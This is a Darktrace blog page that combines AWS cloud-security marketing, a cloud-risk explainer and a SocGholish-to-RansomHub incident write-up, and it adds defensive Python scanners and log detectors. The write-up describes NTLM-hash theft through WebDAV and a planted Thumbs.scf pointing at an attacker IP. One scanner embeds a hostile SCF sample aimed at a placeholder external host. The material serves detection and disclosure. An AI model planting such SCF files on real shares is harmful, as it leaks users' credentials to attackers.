Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Andrew Tsonchev
VP, Security & AI Strategy, Field CISO
09 Mar 2021
Darktrace's Cyber AI brings real-time visibility and adaptive, autonomous defense to your AWS cloud security strategy.
The platform continuously learns what normal behavior looks like for every user, device, and workload in your AWS environment. With this deep understanding of usual ‘patterns of life,’ Darktrace can recognize the subtle deviations that point to a threat, from account takeovers to critical misconfigurations.
This bespoke, real-time knowledge of usual activity allows Darktrace to spot the unknown and unpredictable threats that get through policy-based defenses – all without relying on any rules, signatures, or prior assumptions.
With Amazon Virtual Private Cloud (Amazon VPC) Traffic Mirroring, Darktrace’s self-learning AI can seamlessly access granular packet data in AWS cloud environments, helping the platform build a rich understanding of context. AWS’s recent announcement of the extension of VPC Traffic Mirroring to non-Nitro instance types now allows our customers to gain agentless Cyber AI defense across these instances as well.
Expanding VPC traffic mirroring to non-Nitro instances
Amazon VPC Traffic Mirroring replicates the network traffic from EC2 instances within VPCs and allows customers to leverage this traffic for Darktrace’s AI-driven threat detection and investigation. Darktrace’s Cyber AI learns ‘on the job’ what normal activity looks like in customer AWS environments, in part using the real-time visibility provided by VPC Traffic Mirroring. The platform continuously adapts as each customer’s business evolves, a critical feature given the speed and scale of development in the cloud.
Previously, customers could only enable VPC Traffic Mirroring on their Nitro-based EC2 instances. Now, AWS has announced that this seamless access to hundreds of features from network traffic is extended to select non-Nitro instance types, supporting Darktrace’s ability to easily learn the bespoke behavioral patterns of our customers’ Amazon VPCs.
Customers can now enable VPC Traffic Mirroring on additional instance types such as C4, D2, G3, G3s, H1, I3, M4, P2, P3, R4, X1 and X1e that use the Xen-based hypervisor.* This feature is available in all 20 regions where VPC Traffic Mirroring is currently supported.
VPC Traffic Mirroring supports many of Darktrace’s extensive use cases across AWS, which include:
Data exfiltration and destruction: Detects anomalous device connections and user access, as well as unusual resource deletion, modification, and movement;
Critical misconfigurations: Catches open S3 buckets, anomalous permission changes, and unusual activity around compliance-related data and devices;
Compromised credentials: Spots unusual logins, including brute force attempts and unusual login source/time, as well as unusual user behavior, from rule changes to password resets;
Insider threat and admin abuse: Identifies the subtle signs of malicious insiders – including sensitive file access, resource modification, role changes, and adding/deleting users.
Figure 1: Darktrace illuminates activity in AWS
Autonomous investigation and response for AWS cloud environments
The Darktrace Security Module for AWS provides additional visibility across AWS environments via interaction with AWS CloudTrail, allowing for AI-powered monitoring of management and administration activity. With this deep knowledge of how your business operates in the cloud, Darktrace delivers total coverage across all your AWS services, including:
EC2
IAM
S3
VPC
Lambda
Athena
DynamoDB
Route 53
ACM
RDS
The recently announced Version 5 of the Darktrace platform, which focuses on protecting the cloud and the remote workforce, further augments Darktrace’s coverage of AWS environments. Among many other new features, Version 5 extends the reach of Cyber AI Analyst and Darktrace RESPOND to cloud environments like AWS VPCs.
Cyber AI Analyst augments the work of security teams by autonomously reporting on the full scope of security incidents and reduces triage time by up to 92%. Cyber AI Analyst can now also conduct on-demand investigations into users and devices of interest, ingest third-party alerts to trigger new investigations, and automatically feed AI-generated Incident Reports to any SIEM, SOAR, or downstream ticketing system.
Meanwhile, Darktrace RESPOND brings Autonomous Response to the critical infrastructure which AWS VPCs provide. Darktrace's responses are surgically precise and intelligently maintain normal business operations while stopping emerging threats in real time.**
“Darktrace's innovations are outstanding and have really meshed with our current needs as a security team, from the flexibility of our new cloud-delivered deployment to the extended visibility of the Darktrace Client Sensors.”
– CISO, Real Estate
We have also launched a dedicated user interface for visualization and intuitive analysis of cloud-based threats identified across AWS via the Darktrace Security Module.
Self-Learning AI defense across the enterprise
Darktrace offers AI-driven defense of cloud infrastructure in AWS, as well as across SaaS applications, email, corporate networks, industrial systems, and remote endpoints. Taking a fundamentally unique approach, Darktrace provides the industry’s only self-learning platform that gives complete coverage and visibility across the organization.
This is a critical benefit, as businesses and workforces today are increasingly complex and dynamic. Darktrace can connect the dots between unusual behavior in disparate infrastructure areas and ensure cloud security is not siloed from the monitoring of the rest of the organization.
Darktrace’s adaptive and unified approach allows the solution to detect, investigate, and respond to the full range of threats facing the enterprise – even those unpredictable threats that move across dynamic and diverse environments.
* VPC Traffic Mirroring is not supported on the T2, R3 and I2 instance types and previous generation instances.
** This product is only available in AWS for customers who leverage Darktrace osSensors.
Combatting the Top Three Sources of Risk in the Cloud
With cloud computing, organizations are storing data like intellectual property, trade secrets, Personally Identifiable Information (PII), proprietary code and statistics, and other sensitive information in the cloud. If this data were to be accessed by malicious actors, it could incur financial loss, reputational damage, legal liabilities, and business disruption.
So, as cloud usage continues to grow, the teams in charge of protecting these deployments must understand the associated cybersecurity risks.
What are cloud risks?
Cloud threats come in many forms, with one of the key types consisting of cloud risks. These arise from challenges in implementing and maintaining cloud infrastructure, which can expose the organization to potential damage, loss, and attacks.
There are three major types of cloud risks:
1. Misconfigurations
As organizations struggle with complex cloud environments, misconfiguration is one of the leading causes of cloud security incidents. These risks occur when cloud settings leave gaps between cloud security solutions and expose data and services to unauthorized access. If discovered by a threat actor, a misconfiguration can be exploited to allow infiltration, lateral movement, escalation, and damage.
With the scale and dynamism of cloud infrastructure and the complexity of hybrid and multi-cloud deployments, security teams face a major challenge in exerting the required visibility and control to identify misconfigurations before they are exploited.
Common causes of misconfiguration include skill shortages, outdated practices, and manual workflows. For example, misconfigurations can occur around firewall zones, isolated file systems, and mount systems, all of which require specialized skill to set up and diligent monitoring to maintain.
2. Identity and Access Management (IAM)
IAM has only increased in importance with the rise of cloud computing and remote working. It allows security teams to control which users can and cannot access sensitive data, applications, and other resources.
There are four parts to IAM: authentication, authorization, administration, and auditing and reporting. Within these, there are a lot of subcomponents as well, including but not limited to Single Sign-On (SSO), Two-Factor Authentication (2FA), Multi-Factor Authentication (MFA), and Role-Based Access Control (RBAC).
Security teams are faced with the challenge of allowing enough access for employees, contractors, vendors, and partners to complete their jobs while restricting enough to maintain security. They may struggle to track what users are doing across the cloud, apps, and on-premises servers.
When IAM is misconfigured, it increases the attack surface and can leave accounts with access to resources they do not need to perform their intended roles. This type of risk creates the possibility for threat actors or compromised accounts to gain access to sensitive company data and escalate privileges in cloud environments. It can also allow malicious insiders and users who accidentally violate data protection regulations to cause greater damage.
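The two IAM failure modes described above, an identity holding more rights than its role needs and a resource policy that exposes data to everyone, can both be caught by inspecting policy documents before they are deployed. The linter below is an added example, not Darktrace code or part of the original post; the policy documents it checks are constructed samples, and the rules (wildcard Action or Resource, NotAction, a public Principal with no Condition) are a minimal least-privilege check rather than a complete policy analyser.

```python
"""Least-privilege check for AWS policy documents.

Added example, not Darktrace code: a small linter that flags the two
IAM mistakes the text describes, over-broad grants to an identity and
bucket policies that expose data to everyone. The policy documents below
are constructed samples.
"""
import json
from typing import Any, Union


def _as_list(value: Any) -> list:
    """Policy elements such as Action and Resource may be a string or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_public(principal: Any) -> bool:
    """True when a resource policy's Principal element means 'anyone'."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def lint_policy(document: Union[str, dict]) -> list:
    """Return one finding per Allow statement that grants more than it should."""
    policy = json.loads(document) if isinstance(document, str) else document
    findings = []
    for index, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements narrow access; they are not the risk here
        reasons = []
        actions = _as_list(stmt.get("Action"))
        if "*" in actions or any(a.endswith(":*") for a in actions):
            reasons.append("wildcard Action")
        if "NotAction" in stmt:
            reasons.append("NotAction allows every action not listed")
        if "*" in _as_list(stmt.get("Resource")):
            reasons.append("wildcard Resource")
        if _principal_is_public(stmt.get("Principal")) and "Condition" not in stmt:
            reasons.append("public Principal without a Condition")
        if reasons:
            findings.append({"statement": stmt.get("Sid", f"statement[{index}]"),
                             "reasons": reasons})
    return findings


# Constructed sample: an identity policy where a forgotten 'LegacyAdmin'
# statement grants every action on every resource.
ADMIN_IDENTITY_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "ReadOwnBucket", "Effect": "Allow",
         "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "LegacyAdmin", "Effect": "Allow", "Action": "*", "Resource": "*"},
    ],
}

# Constructed sample: a bucket policy that makes every object world-readable.
PUBLIC_BUCKET_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
        "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*",
    }],
})

if __name__ == "__main__":
    for name, doc in (("identity policy", ADMIN_IDENTITY_POLICY),
                      ("bucket policy", PUBLIC_BUCKET_POLICY)):
        for finding in lint_policy(doc):
            print(f"{name}: {finding['statement']}: {', '.join(finding['reasons'])}")
```

Run against the two samples it reports `LegacyAdmin` for the wildcard Action and Resource and `PublicRead` for the unconditioned public Principal, while the scoped `ReadOwnBucket` statement passes. In practice the same function would be fed the output of `aws iam get-policy-version` or `aws s3api get-bucket-policy` as part of a deployment pipeline.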
3. Cross-domain threats
The complexity of hybrid and cloud environments can be exploited by attacks that cross multiple domains, such as traditional network environments, identity systems, SaaS platforms, and cloud environments. These attacks are difficult to detect and mitigate, especially when a security posture is siloed or fragmented.
Some attack types inherently involve multiple domains, like lateral movement and supply chain attacks, which target both on-premises and cloud networks.
Challenges in securing against cross-domain threats often come from a lack of unified visibility. If a security team does not have unified visibility across the organization’s domains, gaps between various infrastructures and the teams that manage them can leave organizations vulnerable.
Adopting AI cybersecurity tools to reduce cloud risk
For security teams to defend against misconfigurations, IAM failures, and insecure APIs, they require a combination of enhanced visibility into cloud assets and architectures, better automation, and more advanced analytics. These capabilities can be achieved with AI-powered cybersecurity tools.
Such tools use AI and automation to help teams maintain a clear view of all their assets and activities and consistently enforce security policies.
Darktrace / CLOUD is a Cloud Detection and Response (CDR) solution that makes cloud security accessible to all security teams and SOCs by using AI to identify and correct misconfigurations and other cloud risks in public, hybrid, and multi-cloud environments.
It provides real-time, dynamic architectural modeling, which gives SecOps and DevOps teams a unified view of cloud infrastructures to enhance collaboration and reveal possible misconfigurations and other cloud risks. It continuously evaluates architecture changes and monitors real-time activity, providing audit-ready traceability and proactive risk management.
Figure 1: Real-time visibility into cloud assets and architectures built from network, configuration, and identity and access roles. In this unified view, Darktrace / CLOUD reveals possible misconfigurations and risk paths.
Darktrace / CLOUD also offers attack path modeling for the cloud. It can identify exposed assets and highlight internal attack paths to get a dynamic view of the riskiest paths across cloud environments, network environments, and between – enabling security teams to prioritize based on unique business risk and address gaps to prevent future attacks.
Darktrace’s Self-Learning AI ensures continuous cloud resilience, helping teams move from reactive to proactive defense.
Product Marketing Manager, OT Security & Compliance
May 2, 2025
SocGholish: From loader and C2 activity to RansomHub deployment
Over the past year, a clear pattern has emerged across the threat landscape: ransomware operations are increasingly relying on compartmentalized affiliate models. In these models, initial access brokers (IABs) [6], malware loaders, and post-exploitation operators work together.
This specialization has given rise to a new generation of loader campaigns. Threat actors increasingly employ loader operators to quietly establish footholds on the target network; these entities then hand off access to ransomware affiliates. One loader that continues to feature prominently in such campaigns is SocGholish.
What is SocGholish?
SocGholish is a loader malware that has been utilized since at least 2017 [7]. It has long been associated with fake browser updates and JavaScript-based delivery methods on infected websites.
Threat actors often target outdated or poorly secured CMS-based websites like WordPress. Through unpatched plugins, or even remote code execution flaws, they inject malicious JavaScript into the site’s HTML, templates or external JS resources [8]. Historically, SocGholish has functioned as a first-stage malware loader, ultimately leading to deployment of Cobalt Strike beacons [9], and further facilitating access persistence to corporate environments. More recently, multiple security vendors have reported that infections involving SocGholish frequently lead to the deployment of RansomHub ransomware [3] [5].
This blog explores multiple instances within Darktrace's customer base where SocGholish deployment led to subsequent network compromises. Investigations revealed indicators of compromise (IoCs) similar to those identified by external security researchers, along with variations in attacker behavior post-deployment. Key innovations in post-compromise activities include credential access tactics targeting authentication mechanisms, particularly through the abuse of legacy protocols like WebDAV and SCF file interactions over SMB.
Initial access and execution
Since January 2025, Darktrace’s Threat Research team observed multiple cases in which threat actors leveraged the SocGholish loader for initial access. Malicious actors commonly deliver SocGholish by compromising legitimate websites by injecting malicious scripts into the HTML of the affected site. When the visitor lands on an infected site, they are typically redirected to a fake browser update page, tricking them into downloading a ZIP file containing a JavaScript-based loader [1] [2]. In one case, a targeted user appears to have visited the compromised website garagebevents[.]com (IP: 35.203.175[.]30), from which around 10 MB of data was downloaded.
Figure 1: Device Event Log showing connections to the compromised website, followed by connections to the identified Keitaro TDS instances.
Within milliseconds of the connection establishment, the user’s device initiated several HTTPS sessions over the destination port 443 to the external endpoint 176.53.147[.]97, linked to the following Keitaro TDS domains:
packedbrick[.]com
rednosehorse[.]com
blackshelter[.]org
blacksaltys[.]com
To evade detection, SocGholish uses highly obfuscated code and relies on traffic distribution systems (TDS) [3]. TDS is a tool used in digital and affiliate marketing to manage and distribute incoming web traffic based on predefined rules. More specifically, Keitaro is a premium self-hosted TDS frequently utilized by attackers as a payload repository for malicious scripts following redirects from compromised sites. In the previously noted example, it appears that the device connected to the compromised website, which then retrieved JavaScript code from the aforementioned Keitaro TDS domains. The script served by those instances led to connections to the endpoint virtual.urban-orthodontics[.]com (IP: 185.76.79[.]50), successfully completing SocGholish’s distribution.
Figure 2: Advanced Search showing connections to the compromised website, followed by those to the identified Keitaro TDS instances.
Persistence
During some investigations, Darktrace researchers observed compromised devices initiating HTTPS connections to the endpoint files.pythonhosted[.]org (IP: 151.101.1[.]223), suggesting Python package downloads. External researchers have previously noted how attackers use Python-based backdoors to maintain access on compromised endpoints following initial access via SocGholish [5].
Credential access and lateral movement
Credential access – external
Darktrace researchers observed some variation in kill chain activities following initial access and foothold establishment, including in the credential access techniques used. In one such case, an affected device attempted to contact the rare external endpoint 161.35.56[.]33 using the Web Distributed Authoring and Versioning (WebDAV) protocol. WebDAV is an extension of HTTP that allows users to collaboratively edit and manage files on remote web servers. It enables remote shares to be mounted over HTTP or HTTPS, similar to how SMB operates, but using web-based protocols. Windows supports WebDAV natively, which means a UNC path pointing to an HTTP or HTTPS resource can trigger system-level behavior such as authentication.
In this specific case, the system initiated outbound connections using the ‘Microsoft-WebDAV-MiniRedir/10.0.19045’ user agent, targeting the URI path /s on the external endpoint 161.35.56[.]33. During these requests, the host attempted to initiate NTLM authentication and even SMB sessions over the web, both of which failed. Despite the session failures, these attempts indicate a form of forced authentication. Forced authentication exploits a default behavior in Windows where, upon encountering a UNC path, the system will automatically try to authenticate to the resource using NTLM – often without any user interaction. Although no files were directly retrieved, the WebDAV server was still likely able to retrieve the user’s NTLM hash during the session establishment requests, which the adversary can later attempt to crack offline.
Credential access – internal
In another investigated incident, Darktrace observed a related technique utilized for credential access and lateral movement. This time, the infected host uploaded a file named ‘Thumbs.scf’ to multiple internal SMB network shares. Shell Command File (SCF) is a legacy Windows file format used primarily for Windows Explorer shortcuts. These files contain instructions for rendering icons or triggering shell commands, and they can be executed implicitly when a user simply opens a folder containing the file – no clicks required.
The ‘Thumbs.scf’ file dropped by the attacker was crafted to exploit this behavior. Its contents included a [Shell] section with the Command=2 directive and an IconFile path pointing to a remote UNC resource on the same external endpoint, 161.35.56[.]33, seen in the previously described case – specifically, ‘\\161.35.56[.]33\share\icon.ico’. When a user on the internal network navigates to the folder containing the SCF file, their system will automatically attempt to load the icon. In doing so, the system issues a request to the specified UNC path, which again prompts Windows to initiate NTLM authentication.
This pattern of activity implies that the attacker leveraged passive internal exposure: users who simply browsed a compromised share would unknowingly send their NTLM hashes to an external attacker-controlled host. Unlike the WebDAV approach, which required initiating outbound communication from the infected host, this SCF method relies on internal users interacting with poisoned folders.
Figure 3: Contents of the file 'Thumbs.scf' showing the UNC resource hosted on the external endpoint.
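A defender can find planted SCF files by parsing the same [Shell]/IconFile structure the technique relies on. The scanner below is an added example, not Darktrace code or part of the original post: it parses SCF contents, extracts the host from a UNC IconFile path, classifies the host as local, internal or external, and walks a mounted share to report files that point outward. The sample files, the placeholder address 203.0.113.5 and the `.corp.example` DNS suffix are constructed; the internal ranges are the RFC 1918, loopback and link-local blocks.

```python
"""Find SCF files whose icon points at a remote host.

Added example, not Darktrace code: a scanner for the SCF technique the
text describes. The [Shell] section of an SCF is INI-style text; when
Explorer renders a folder it resolves the IconFile path, so an IconFile
on a UNC path to an external host makes every browsing client try to
authenticate outward. The sample files and network ranges are constructed.
"""
import configparser
import ipaddress
import os
import re
from typing import Iterable

# RFC 1918, loopback and link-local ranges: anything else counts as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# \\host\share\... -> capture 'host'
UNC_HOST_RE = re.compile(r"^\\\\([^\\]+)\\")


def parse_scf(text: str) -> dict:
    """Return the [Shell] section as a dict with lower-cased keys."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str.lower
    parser.read_string(text)
    return dict(parser["Shell"]) if parser.has_section("Shell") else {}


def is_external_host(host: str, internal_suffixes: Iterable[str] = (".corp.example",)) -> bool:
    """Decide whether a UNC host lies outside the organisation.

    'internal_suffixes' is a constructed placeholder for the organisation's
    own DNS suffixes; a bare single-label (NetBIOS-style) name is internal.
    """
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "." in host and not host.lower().endswith(tuple(internal_suffixes))
    return not any(addr in net for net in INTERNAL_NETS)


def assess_scf(text: str) -> dict:
    """Classify one SCF's contents: local icon, internal UNC, or external UNC."""
    icon = parse_scf(text).get("iconfile", "").strip()
    match = UNC_HOST_RE.match(icon)
    host = match.group(1) if match else None
    verdict = {"icon_file": icon, "unc_host": host, "suspicious": False, "reason": ""}
    if host is None:
        verdict["reason"] = "IconFile is a local resource"
    elif is_external_host(host):
        verdict["suspicious"] = True
        verdict["reason"] = (f"IconFile on external host {host}: browsing the folder "
                             "forces outbound NTLM authentication")
    else:
        verdict["reason"] = f"IconFile on internal host {host}"
    return verdict


def scan_share(root: str) -> list:
    """Walk a mounted share and report every .scf file that points outward."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                verdict = assess_scf(fh.read())
            if verdict["suspicious"]:
                hits.append((path, verdict["unc_host"]))
    return hits


# Constructed sample: the classic 'Show Desktop' SCF, icon taken from a local binary.
BENIGN_SHOW_DESKTOP = """[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
"""

# Constructed sample shaped like the Thumbs.scf described above, pointing at a
# placeholder address (TEST-NET-3) rather than a real host.
SUSPICIOUS_THUMBS_SCF = r"""[Shell]
Command=2
IconFile=\\203.0.113.5\share\icon.ico
"""

if __name__ == "__main__":
    for label, sample in (("Show Desktop.scf", BENIGN_SHOW_DESKTOP),
                          ("Thumbs.scf", SUSPICIOUS_THUMBS_SCF)):
        print(label, "->", assess_scf(sample)["reason"])
```

The benign sample is not flagged because `explorer.exe,3` is a local resource reference, while the Thumbs.scf-shaped sample is flagged because its IconFile resolves to a host outside every internal range. Run `scan_share()` against a mounted share to sweep it; pairing this with a file-server rule that blocks `.scf` writes, and with egress filtering of SMB and WebDAV to the internet, removes the outbound authentication the technique depends on.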
Command-and-control
Following initial compromise, affected devices would then attempt outbound connections using the TLS/SSL protocol over port 443 to different sets of command-and-control (C2) infrastructure associated with SocGholish. The malware frequently uses obfuscated JavaScript loaders to initiate its infection chain, and once dropped, it communicates back to its infrastructure over standard web protocols, typically HTTPS over port 443. However, this set of connections would precede a second set of outbound connections, this time to infrastructure linked to RansomHub affiliates, possibly facilitated by the Python-based backdoor described above.
Connectivity to RansomHub infrastructure relied on defense evasion tactics, such as port-hopping. The idea behind port-hopping is to disguise C2 traffic by avoiding consistent patterns that might be caught by firewalls and intrusion detection systems. By cycling through ephemeral ports, the malware increases its chances of slipping past basic egress filtering or network monitoring rules that only scrutinize common web traffic ports like 443 or 80. Darktrace analysts identified systems connecting to destination ports such as 2308, 2311, 2313 and more – all on the same destination IP address associated with the RansomHub C2 environment.
Figure 4: Advanced Search connection logs showing connections over destination ports that change rapidly.
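Both network behaviours described in this post, the WebDAV Mini-Redirector reaching a bare external IP with no hostname (Credential access – external, above) and rapid cycling through non-web ports to a single C2 address, can be expressed as simple detections over connection logs. The script below is an added example, not Darktrace code or its model logic: it parses a constructed CSV connection log and runs both checks. The addresses (TEST-NET-2 and RFC 1918), timestamps, hostnames and the thresholds (three distinct ports within five minutes) are constructed; the user-agent string is the one quoted in the text.

```python
"""Two network detections over a constructed connection log.

Added example, not Darktrace code: the first check mirrors the WebDAV
forced-authentication case (a Windows WebDAV Mini-Redirector talking to a
bare external IP with no hostname), the second the port-hopping C2 pattern
(many distinct non-web ports to one external address in a short window).
The log format, addresses and timestamps are constructed for this example.
"""
import csv
import io
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed connection log: one row per connection, HTTP fields blank for raw TCP.
SAMPLE_LOG = """ts,src,dst,dport,host,user_agent
2025-01-14T09:12:01Z,10.20.30.41,198.51.100.7,80,,Microsoft-WebDAV-MiniRedir/10.0.19045
2025-01-14T09:12:03Z,10.20.30.41,198.51.100.7,80,,Microsoft-WebDAV-MiniRedir/10.0.19045
2025-01-14T09:12:30Z,10.20.30.60,10.0.5.10,80,sharepoint.corp.example,Microsoft-WebDAV-MiniRedir/10.0.19045
2025-01-14T09:13:10Z,10.20.30.61,198.51.100.20,443,files.example-cloud.test,Microsoft-WebDAV-MiniRedir/10.0.19045
2025-01-14T09:15:00Z,10.20.30.41,198.51.100.7,2308,,
2025-01-14T09:15:40Z,10.20.30.41,198.51.100.7,2311,,
2025-01-14T09:16:15Z,10.20.30.41,198.51.100.7,2313,,
2025-01-14T09:17:02Z,10.20.30.41,198.51.100.7,2320,,
2025-01-14T09:16:00Z,10.20.30.55,198.51.100.9,443,,
2025-01-14T09:16:05Z,10.20.30.55,198.51.100.9,8443,,
2025-01-14T09:16:09Z,10.20.30.55,198.51.100.9,8080,,
"""


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_log(text: str) -> list:
    """Parse the CSV log into records with typed fields."""
    records = []
    for row in csv.DictReader(io.StringIO(text)):
        records.append({
            "ts": datetime.strptime(row["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "src": row["src"], "dst": row["dst"], "dport": int(row["dport"]),
            "host": row["host"], "user_agent": row["user_agent"],
        })
    return records


def detect_webdav_to_external_ip(records) -> list:
    """WebDAV Mini-Redirector traffic to an external address with no hostname.

    A legitimate WebDAV share is addressed by name; a UNC path planted by an
    attacker is typically a bare IP, so the Host header is empty or an IP.
    """
    hits = set()
    for r in records:
        if not r["user_agent"].startswith("Microsoft-WebDAV-MiniRedir"):
            continue
        if is_internal(r["dst"]):
            continue
        if r["host"] == "" or r["host"] == r["dst"]:
            hits.add((r["src"], r["dst"]))
    return sorted(hits)


def detect_port_hopping(records, min_ports=3, window=timedelta(minutes=5),
                        ignore_ports=(80, 443)) -> list:
    """Flag (src, dst) pairs hitting >= min_ports distinct non-web ports within 'window'."""
    by_pair = defaultdict(list)
    for r in records:
        if r["dport"] in ignore_ports or is_internal(r["dst"]):
            continue
        by_pair[(r["src"], r["dst"])].append((r["ts"], r["dport"]))
    findings = []
    for (src, dst), events in by_pair.items():
        events.sort()
        best, start = set(), 0
        for end in range(len(events)):  # sliding time window over ordered events
            while events[end][0] - events[start][0] > window:
                start += 1
            ports = {port for _, port in events[start:end + 1]}
            if len(ports) > len(best):
                best = ports
        if len(best) >= min_ports:
            findings.append({"src": src, "dst": dst, "ports": sorted(best)})
    return findings


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("WebDAV to bare external IP:", detect_webdav_to_external_ip(recs))
    print("Port hopping:", detect_port_hopping(recs))
```

On the sample log only 10.20.30.41 is reported by both checks: its WebDAV requests go to an external IP with an empty Host header, and it later touches four distinct high ports on the same address within two minutes. The device talking to an internal SharePoint by name and the one using a named external WebDAV service are not flagged, and the host touching only two non-web ports stays under the threshold; tune `min_ports` and `window` to the baseline of the environment.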
Conclusion
Since the beginning of 2025, Darktrace analysts identified a campaign whereby ransomware affiliates leveraged SocGholish to establish network access in victim environments. This access enabled multiple distinct sets of post-exploitation activity. Credential access played a key role, with affiliates abusing WebDAV and NTLM over SMB to trigger authentication attempts. The attackers were also able to plant SCF files internally to expose NTLM hashes from users browsing shared folders. These techniques evidently point to deliberate efforts at early lateral movement and foothold expansion before deploying ransomware. As ransomware groups continue to refine their playbooks and work more closely with sophisticated loaders, it becomes critical to track not just who is involved, but how access is being established, expanded, and weaponized.
Credit to Chrisina Kreza (Cyber Analyst) and Adam Potter (Senior Cyber Analyst)
Appendices
Darktrace / NETWORK model alerts
· Anomalous Connection / SMB Enumeration
· Anomalous Connection / Multiple Connections to New External TCP Port
· Anomalous Connection / Multiple Failed Connections to Rare Endpoint
· Anomalous Connection / New User Agent to IP Without Hostname
· Compliance / External Windows Communication
· Compliance / SMB Drive Write
· Compromise / Large DNS Volume for Suspicious Domain
· Compromise / Large Number of Suspicious Failed Connections
· Device / Anonymous NTLM Logins
· Device / External Network Scan
· Device / New or Uncommon SMB Named Pipe
· Device / SMB Lateral Movement
· Device / Suspicious SMB Activity
· Unusual Activity / Unusual External Activity
· User / Kerberos Username Brute Force
MITRE ATT&CK mapping
· Credential Access – T1187 Forced Authentication
· Credential Access – T1110 Brute Force
· Command and Control – T1071.001 Web Protocols
· Command and Control – T1571 Non-Standard Port
· Discovery – T1083 File and Directory Discovery
· Discovery – T1018 Remote System Discovery
· Discovery – T1046 Network Service Discovery
· Discovery – T1135 Network Share Discovery
· Execution – T1059.007 JavaScript
· Lateral Movement – T1021.002 SMB/Windows Admin Shares